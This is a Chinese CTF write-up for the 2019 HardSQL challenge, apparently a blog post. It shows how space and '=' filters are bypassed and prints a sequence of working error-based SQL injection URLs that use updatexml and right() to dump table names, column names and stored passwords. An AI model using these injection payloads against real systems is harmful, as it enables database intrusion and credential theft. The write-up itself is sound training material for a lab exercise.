[极客⼤挑战 2019]HardSQL

如题是⼀个注⼊,

这题在空格后⾯不能带字符、不能有=号、sleep。

尝试过%20 %09(tab)⽤不了

出现了下⾯这个⻚⾯已经表示可以使⽤报错注⼊了。(syntax error)

使⽤1',注意需要区分⼤⼩写,必须要英⽂键盘的',看到报错了

注意判断闭合符号时候,需要看near的信息,这个信息会先打上⼀个'' 双引号。

判断闭合符号核⼼就在于看报错,如果报错了,说明形成了新的闭合,不然按照之前的闭合肯定是正常的。

使⽤http://e7d6b403-ed8a-40d2-8abc-0ef886262d69.node4.buuoj.cn:81/check.php?

username=22&password=11'or(select(1))%23

这⾥要注意如下,直接输⼊updatexml是有sql syntax error的:

直接开始报错注⼊:

输⼊

http://8f4498ca-cd27-4251-b126-1de126b28554.node4.buuoj.cn:81/check.php?

username=22&password=11'or(updatexml(1,concat(0x7e,

(select(group_concat(table_name))from(information_schema.tables)),0x7e),3))%23

输⼊http://8f4498ca-cd27-4251-b126-1de126b28554.node4.buuoj.cn:81/check.php?

username=22&password=11%27or(updatexml(1,concat(0x7e,

(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like(database()))),0x7

e),3))%23

输⼊http://8f4498ca-cd27-4251-b126-1de126b28554.node4.buuoj.cn:81/check.php?

username=22&password=11%27or(updatexml(1,concat(0x7e,

(select(group_concat(column_name))from(information_schema.columns)where((table_name)like('H4rDsq1'))),0x

7e),3))%23

输⼊http://8f4498ca-cd27-4251-b126-1de126b28554.node4.buuoj.cn:81/check.php?

username=22&password=11%27or(updatexml(1,concat(0x7e,

(select(group_concat(id,username,password))from(H4rDsq1)),0x7e),3))%23

发现⻓度不够,但是substr⼜被过滤了,不给⽤。

因此使⽤right函数即可http://8f4498ca-cd27-4251-b126-1de126b28554.node4.buuoj.cn:81/check.php?

username=22&password=11%27or(updatexml(1,concat(0x7e,right((select(group_concat(password))from(H4rD

sq1)),23),0x7e),3))%23

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值